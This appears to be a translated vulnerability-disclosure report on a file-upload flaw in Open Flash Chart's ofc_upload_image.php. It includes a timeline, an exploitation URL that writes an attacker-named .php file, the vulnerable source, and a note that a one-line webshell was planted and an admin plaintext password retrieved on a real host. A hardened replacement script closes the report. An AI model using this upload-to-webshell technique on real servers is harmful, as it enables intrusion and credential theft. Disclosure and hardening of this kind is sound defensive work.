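2015-08-21: Details reported to the vendor; awaiting vendor handling
2015-08-24: Vendor confirmed; details disclosed to the vendor only
2015-09-03: Details disclosed to core white hats and experts in related fields
2015-09-13: Details disclosed to regular white hats
2015-09-23: Details disclosed to intern white hats
2015-10-08: Details disclosed to the public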
Indirect privilege escalation
The file saves POSTed data as a file with an arbitrary extension.
Vulnerable file: /chart/php-ofc-library/ofc_upload_image.php
Exploitation: /chart/libraries/ofc_upload_image.php?name=m7lrv.php (m7lrv.php is the file name; POST arbitrary data)
Saved to: http://localhost/chart/tmp-upload-images/m7lrv.php

<?php

//
// In Open Flash Chart -> save_image debug mode, you
// will see the 'echo' text in a new window.
//

/*

print_r( $_GET );
print_r( $_POST );
print_r( $_FILES );

print_r( $GLOBALS );
print_r( $GLOBALS["HTTP_RAW_POST_DATA"] );

*/

// default path for the image to be stored //
$default_path = '../tmp-upload-images/';

if (!file_exists($default_path)) mkdir($default_path, 0777, true);

// full path to the saved image including filename //
$destination = $default_path . basename( $_GET[ 'name' ] );

echo 'Saving your image to: '. $destination;
// print_r( $_POST );
// print_r( $_SERVER );
// echo $HTTP_RAW_POST_DATA;

//
// POST data is usually string data, but we are passing a RAW .png
// so PHP is a bit confused and $_POST is empty. But it has saved
// the raw bits into $HTTP_RAW_POST_DATA
//

$jfh = fopen($destination, 'w') or die("can't open file");
fwrite($jfh, $HTTP_RAW_POST_DATA);
fclose($jfh);

//
// LOOK:
//
exit();

//
// PHP5:
//

// default path for the image to be stored //
$default_path = 'tmp-upload-images/';

if (!file_exists($default_path)) mkdir($default_path, 0777, true);

// full path to the saved image including filename //
$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] );

// move the image into the specified directory //
if (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {
    echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";
} else {
    echo "FILE UPLOAD FAILED";
}

?>
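One-line webshell: **.**.**.**/htdocs/dayrui/libraries/tmp-upload-images/m7lrv.php password: m7lrv
Virtual terminal:
Uploaded a tool for retrieving the administrator user's plaintext password:
Connected to it: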
1. Update the WSS project management system
2. Change the administrator password
3. Configure server policies and folder permissions
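A hardened replacement for the raw-POST branch of ofc_upload_image.php shown above, as an added example that is not code from the original report or from Open Flash Chart: it ignores the client-supplied name, accepts only bytes that parse as a PNG, and writes them outside the web root. UPLOAD_DIR, MAX_BYTES and store_chart_image() are assumed names, and the directory path is a placeholder.

```php
<?php
// Added example, not Open Flash Chart code. UPLOAD_DIR, MAX_BYTES and
// store_chart_image() are assumed names. Requires PHP 7+ (random_bytes).

const UPLOAD_DIR = '/var/lib/chart-uploads'; // assumption: outside the web root
const MAX_BYTES  = 2097152;                  // assumption: 2 MiB cap per image

/**
 * Validate raw request bytes as a PNG and store them under a server-chosen
 * name. Returns the stored file name, or null when the payload is rejected.
 */
function store_chart_image(string $raw, string $dir = UPLOAD_DIR): ?string
{
    if ($raw === '' || strlen($raw) > MAX_BYTES) {
        return null;
    }
    // Check the PNG signature, then let the image parser confirm the type.
    if (strncmp($raw, "\x89PNG\r\n\x1a\n", 8) !== 0) {
        return null;
    }
    $info = @getimagesizefromstring($raw);
    if ($info === false || $info[2] !== IMAGETYPE_PNG) {
        return null;
    }
    if (!is_dir($dir) && !mkdir($dir, 0750, true)) {
        return null;
    }
    // The client never chooses the name or extension. A valid PNG can still
    // carry embedded text, so the fixed ".png" suffix and the non-web
    // directory are what keep the stored bytes from being executed.
    $name = bin2hex(random_bytes(16)) . '.png';
    $path = $dir . '/' . $name;
    if (file_put_contents($path, $raw, LOCK_EX) === false) {
        return null;
    }
    chmod($path, 0640);
    return $name;
}

if (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST') {
    // Read at most MAX_BYTES + 1 so oversized bodies are detected and rejected.
    $raw  = (string) file_get_contents('php://input', false, null, 0, MAX_BYTES + 1);
    $name = store_chart_image($raw);
    if ($name === null) {
        http_response_code(400);
        exit('Upload rejected');
    }
    echo 'Saved as ' . $name;
}
```

If the upload directory has to stay under the document root, the web server should additionally be configured not to hand files in it to the PHP interpreter.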
Severity: Medium
Vulnerability Rank: 6
Confirmed: 2015-08-24 08:32
Notifying the user to handle the issue
None yet